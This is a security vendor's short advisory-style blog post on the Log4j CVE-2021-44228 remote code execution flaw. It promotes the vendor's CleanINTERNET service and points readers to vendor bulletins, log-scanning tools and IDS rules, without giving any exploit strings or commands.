On December 9th, the CVE-2021-44228 Apache Log4j RCE was released publicly. Before the threats were made public, Centripetal CleanINTERNET shielded this threat proactively and saved our customers valuable time, reputation, and the risk of non-compliance by preventing any compromise associated with this vulnerability. Many organizations are likely to be impacted by this vulnerability without understanding why or how. CleanINTERNET shields 99% of attacks and delivers enterprise-class cyber security to all organizations regardless of size or industry.
Since the release of an initial proof of concept for CVE-2021-44228, Centripetal has witnessed an uptick in reconnaissance-based scanning for this new vulnerability.
Log4j is a Java based logging utility used by a variety of applications due to its extensibility and ability to output data in standardized formats. It is often included with other applications or devices for use through a localized API.
The vulnerability can operate due to improper input validation, which when ingested may result in Remote Code Execution, allowing for an attacker to perform actions and commands on the vulnerable machine. Some common attackers are installing trojans, cryptocurrency miners, Cobalt Strike beacons and establishing remote shells for manual access.
Software vendors who utilize Log4j have begun posting security bulletins notifying clients of their own vulnerability status, and a large number of them have been consolidated into this GitHub Gist. Several tools exist to scan logs for exploitation attempts. Both FoxIT SRT and EmergingThreats by ProofPoint have released IDS rules to identify exploitation attempts.